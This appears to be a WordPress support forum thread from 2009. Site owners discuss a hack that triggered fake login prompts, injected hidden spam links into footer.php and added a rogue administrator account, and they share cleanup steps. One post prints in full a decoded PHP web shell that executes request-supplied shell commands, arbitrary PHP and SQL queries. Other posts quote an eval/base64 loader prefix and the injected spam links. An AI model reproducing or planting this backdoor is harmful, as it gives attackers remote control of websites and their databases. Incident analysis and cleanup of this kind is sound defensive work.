Editing triggers popup asking for username and password – security breach?

We noticed that the code injected into the files was run through an eval and a decode so we decoded the string and found this php code:

{

if (!function_exists(‘______safeshell’))

{

function ______safeshell($komut) {

@ini_restore(“safe_mode”);

@ini_restore(“open_basedir”);

$disable_functions = array_map(‘trim’, explode(‘,’, ini_get(‘disable_functions’)));

if (!empty ($komut)) {

if (function_exists(‘passthru’) && !in_array(‘passthru’, $disable_functions)) {

//@ ob_start();

@ passthru($komut);

//$res = @ ob_get_contents();

//@ ob_end_clean();

}

elseif (function_exists(‘system’) && !in_array(‘system’, $disable_functions)) {

//@ ob_start();

@ system($komut);

//$res = @ ob_get_contents();

//@ ob_end_clean();

}

elseif (function_exists(‘shell_exec’) && !in_array(‘shell_exec’, $disable_functions)) {

$res = @ shell_exec($komut);

echo $res;

}

elseif (function_exists(‘exec’) && !in_array(‘exec’, $disable_functions)) {

@ exec($komut, $res);

$res = join(“\n”, $res);

echo $res, “\n”;

}

elseif (@ is_resource($f = @ popen($komut, “r”))) {

//$res = “”;

while (!@ feof($f)) {

//$res .= @ fread($f, 1024);

echo(@ fread($f, 1024));

}

@ pclose($f);

}

else

{

$res = {$komut};

echo $res;

}

}

}

};

if (isset ($_REQUEST[‘php_bdb7e9f039f4c7d9100073e131610a87’])) {

echo “<php_bdb7e9f039f4c7d9100073e131610a87_result>\n”;

if ($_REQUEST[‘php_bdb7e9f039f4c7d9100073e131610a87’] == ‘eval’) {

eval(get_magic_quotes_gpc() || get_magic_quotes_runtime() ? stripslashes($_REQUEST[‘cmd’]) : $_REQUEST[‘cmd’]);

}

else if ($_REQUEST[‘php_bdb7e9f039f4c7d9100073e131610a87’] == ‘exec’) {

______safeshell(get_magic_quotes_gpc() || get_magic_quotes_runtime() ? stripslashes($_REQUEST[‘cmd’]) : $_REQUEST[‘cmd’]);

}

else if ($_REQUEST[‘php_bdb7e9f039f4c7d9100073e131610a87’] == ‘query’) {

$result = mysql_query(get_magic_quotes_gpc() || get_magic_quotes_runtime() ? stripslashes($_REQUEST[‘cmd’]) : $_REQUEST[‘cmd’], $wpdb->dbh);

if (!$result)

{

echo “php_bdb7e9f039f4c7d9100073e131610a87_result_MYSQL_QUERY_FAILED: “, mysql_error($wpdb->dbh), “\n”;

die();

}

else if (is_resource($result))

{

$res = array();

while ($row = mysql_fetch_assoc($result))

{

$res[] = $row;

};

mysql_free_result($result);

echo serialize($res);

die();

}

else

{

echo “php_bdb7e9f039f4c7d9100073e131610a87_result_MYSQL_QUERY_SUCCEEDED: “, mysql_affected_rows($wbdb->dbh), ” rows affected\n”;

die();

}

};

echo “\n</php_bdb7e9f039f4c7d9100073e131610a87_result>\n”;

die();

};

};

anyone feel like explaining exactly what this is attempting to do? at a glance it looks like it is probing for an invulnerability either in the server configuration or wordpress itself?

Is this a coincidence… or not?

Today I went to bluehost cpanel and logged into my email (webmail) account there. I wanted to check some things and also change my password. I was confronted with another alert message — A username and password are being requested by https://boxxxx.bluehost.com:xxxx. The site says: “WebMail” —

Recognizing that this was exactly like the Magic thing, I kept hitting cancel until it went away. So, who do I alert about this? Did it happen BECAUSE I experienced the Magic problem?

My vars.php code looks clean, by the way. And no further problems with magic since I updated and cleaned the plugins (though I did notice some foreign code in my footer this week, which I removed). Where else do I need to look for malicious code? Any thoughts or suggestions?

I just checked my footer.php again and more code had been inserted. This is just a sampling –

<p style="display: none"> <a href="https://www.service.gatech.edu/dev/images/grid_large/thumbnail_1227035962.php?p=adobe-presenter-for-mac">adobe presenter for mac</a>
<a href="https://www.service.gatech.edu/dev/images/grid_large/thumbnail_1227035962.php?p=acala-dvd-creator-3">acala dvd creator 3 download</a>
<a href="https://www.service.gatech.edu/dev/images/grid_large/thumbnail_1227035962.php?p=xilisoft-1click-dv-to-dvd">xilisoft 1click dv to dvd download</a>
<a href="https://www.service.gatech.edu/dev/images/grid_large/thumbnail_1227035962.php?p=futuremark-pcmark-vantage-advanced">futuremark pcmark vantage advanced</a>
<a href="https://www.service.gatech.edu/dev/images/grid_large/thumbnail_1227035962.php?p=xilisoft-video-converter-ultimate-5-1">xilisoft video converter ultimate 5.1</a>
<a href="https://www.service.gatech.edu/dev/images/grid_large/thumbnail_1227035962.php?p=roxio-copy---convert-3">download roxio copy & convert 3</a>

Where is it coming from and how can I get rid of it? Help please!

I encountered this same problem yesterday. This is what I had to do to get it fixed:

First I searched all .php files of my plugin (wp-content/plugins) and found some files starting with “<?php eval(gzinflate(base64_decode(‘1VVtT9swEP7c/gpTVSSRurEhoECB…. ?>” so I removed that from all the files and then updated the plugins, but it was still not working correctly. So this time I backedup my db and WordPress files and did the update right from the admin control panel and everything is working great.

I removed foreign code from my plugins, changed passwords, and updated. This solved the problem of the authentication box appearing. However, later I discovered the above code and it is still appearing in my footer php. I have removed it and it returns within a couple of days. Is anyone else having this problem? I am not sure how or where the additional code is generating from. I would like to update to 2.8.4 but wanted to wait and see if I could find the culprit code that is infecting the footer since the update I did last time obviously did not completely cure the problem.

danceadvantage, when it requests a username and password at box#.bluehost.com for webmail, that means that it no longer has the session authenticated and you need to login again. It is normal and not the results of a hack.

As to the current problems you are having, they are definitely the result of a hack. The first thing to do is to rename your plugins directory and change your theme to the default theme for the time being. If there are security issues through either of these, it will help to prevent the inserted code from reappearing.

After doing that, you should upload all of the WordPress core files from the current version of WordPress you are running over the top of the existing core files. If there are core files which have been hacked, this will put the correct code back up. Simply upgrading will also help with this oftentimes.

Read the sticky about the gooooogle hack and see if it applies to you.
Then you need to work on getting your site more secure. Make sure to only choose more recent versions of plugins. Don’t pick a plugin that hasn’t been tested to work with WordPress 2.8.x since a considerably older version of BlueHost. Find a theme that is also a more recent/updated theme.

Browse the forums for suggestions on securing your site.
Read the following:
https://codex.www.ads-software.com/Hardening_WordPress
https://ocaoimh.ie/2008/06/08/did-your-wordpress-site-get-hacked/
https://guvnr.com/web/blogging/10-tips-to-make-wordpress-hack-proof/
https://www.ads-software.com/support/topic/281767?replies=19

Reuploading my original vars.php file seems to have solved the “Magic” problem. Comparing the dates and file sizes of other files with those on my local machine, I discovered that my .htaccess file had a different date 7/30/09. I know I didn’t change it and no one else works on my site, so I replaced it with my original, too. So far, so good.

In hindsight, I probably should have downloaded it to look at and see what had been added/changed: it’s only a text file after all.

Anybody else have their .htaccess file changed by this Trojan?

I’m still not clear how it got in. I don’t allow comments unless they’ve been approved: too much spam.

bh_WP_fan,

Where is “sticky about the gooooogle hack”, as you say above?

https://www.ads-software.com/support/topic/293832?replies=15

this incident looks similar to what’s being discussed on this thread: https://mashable.com/2009/09/05/wordpress-attack/ maybe it’s the same issue?

Got hit with the ‘Magic” hack recently on one of my blogs. I was running 2.8.2 at the time.

Cleaned up all the code, replaced the vars.php file from a backup and then did a complete backup once I was sure all of the hacked code was gone from all plugins and elsewhere.

Now at 2.8.4, but wondering like the others here, if this will provide safety from this same hack.

Thanks go out to yokima and others who figured out how to get rid of this.

1. Re-uploaded wp-includes/vars.php from backed up copy. “Magic” authentication stopped.
2. Changed all admin passwords.
3. Upgraded site to latest version
4. Examined plugins for malicious code. Found one file infected and removed the code.
5. Backed up all files in case of next attack.

Has anyone decoded the code to see what it looks like?

Guys, I just experienced this, and thought about the users with access when I stumbled upon this:

When I would click on users with Administrator access, the indicator only showed (1), but when I clicked on the authors, the Administrator access indicator showed (2). It would go back and forth. So I decided to go into the database.

I went into the wp_usermeta table and searched for all records where the meta_key was like wp_user_level. Sure enough, 2 records popped up where the wp_user_level was 10(Administrator access), mine and one that was never there before!

So I grabbed the user_id from that, and looked in the wp_users table, and I search for the user where the id was the same as it was in the other table. The record that came up was a person I never heard of, and was there WITHOUT an email address listed in the database. This obviously is not right. You all might want to check your databases for extra users in there that shouldn’t have administrator access, because I think this exploit places it in there. If you backed up your databases and re-imported them, you will just end up reimporting the same user back into WordPress!

Here is the details of the user that I found:
umeta_id = 593
user_id = 106
meta_key = wp_user_level
meta_value = 10
name = JohnathonTownsend73
password = $P$BZnYFY8XjH5w8yS.Div59Op0c/2AQA0
userid = johnathontownsend73
joindate = 2009-09-05 08:53:47